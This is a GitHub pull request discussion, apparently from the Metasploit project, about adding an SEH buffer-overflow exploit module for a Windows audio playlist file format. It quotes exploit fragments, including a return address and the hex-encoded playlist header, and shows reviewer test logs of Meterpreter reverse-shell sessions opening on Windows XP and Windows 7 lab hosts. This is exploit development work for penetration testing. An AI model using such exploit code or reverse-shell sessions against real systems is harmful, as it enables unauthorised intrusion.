Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

added audiotran_pls_1424 fileformat for Windows #3000

Merged
merged 2 commits into from Feb 18, 2014
Merged

added audiotran_pls_1424 fileformat for Windows #3000

merged 2 commits into from Feb 18, 2014

Conversation

philwantsfish
Copy link
Contributor

This is a port of an SEH exploit from exploit-db[1]. I modified the p/p/r address of the exploit and testing this on Windows XP. The exploit-db page has a link to the vulnerable software for testing.

[1] http://www.exploit-db.com/exploits/14961/

@wvu
Copy link
Contributor

wvu commented Feb 16, 2014

Where did you get the p/p/r from, and why did you need to change it?

'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', { 'Ret' => 0x1001cd67 } ], #p/p/r
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Please comment where you got your p/p/r from. :)

@wvu
Copy link
Contributor

wvu commented Feb 16, 2014

Just looking for an explanation. :)

@philwantsfish
Copy link
Contributor Author

It did not need to be changed and I don't mind changing this back to the
original value, if that is a preferred. I rewrote the exploit form scratch
for practice and settled on a different p/p/r from a Mona command.

On Sun, Feb 16, 2014 at 4:40 PM, wvu-r7 notifications@github.com wrote:

Where did you get the p/p/r from, and why did you need to change it?

Reply to this email directly or view it on GitHubhttps://github.com//pull/3000#issuecomment-35214696
.

end

def exploit
sploit = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0D\x0A\x46\x69\x6C\x65\x31\x3D"
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

sploit = "[playlist]\r\nFile1="

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I understand that the line is from the original exploit, but we have no need to hide things as hex. :)

@wvu
Copy link
Contributor

wvu commented Feb 16, 2014

Ah, okay. If it's a reliable p/p/r, then that's great. Just comment where you got it from. Thanks!

@wvu
Copy link
Contributor

wvu commented Feb 16, 2014

Specifically where you got it from. So, the binary? A DLL? Which DLL? :)

@wvu
Copy link
Contributor

wvu commented Feb 16, 2014

I suppose I could figure it out myself, but I'll let you make the commit. :P Exploit looks great, btw!

@wvu
Copy link
Contributor

wvu commented Feb 18, 2014

Windows XP SP3:

msf exploit(handler) > exploit 

[*] Started reverse handler on 172.16.126.1:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 172.16.126.128
[*] Meterpreter session 1 opened (172.16.126.1:4444 -> 172.16.126.128:3751) at 2014-02-18 13:15:44 -0600

meterpreter > 

Windows 7 SP1:

msf exploit(handler) > exploit 

[*] Started reverse handler on 172.16.126.1:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 172.16.126.133
[*] Meterpreter session 2 opened (172.16.126.1:4444 -> 172.16.126.133:49158) at 2014-02-18 13:19:55 -0600

meterpreter > 

@philwantsfish
Copy link
Contributor Author

Awesome, thank you for verifying! I should have posted output from the testing I did as well.

Let me know if there is anything else I need to do to get this merged in.

@wvu
Copy link
Contributor

wvu commented Feb 18, 2014

Thanks for being on top of this, @Fillfish. :)

wvu added a commit that referenced this pull request Feb 18, 2014
@wvu wvu merged commit 98958bc into rapid7:master Feb 18, 2014
@todb-r7
Copy link

todb-r7 commented Feb 18, 2014

This is missing references and disclosure date.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

3 participants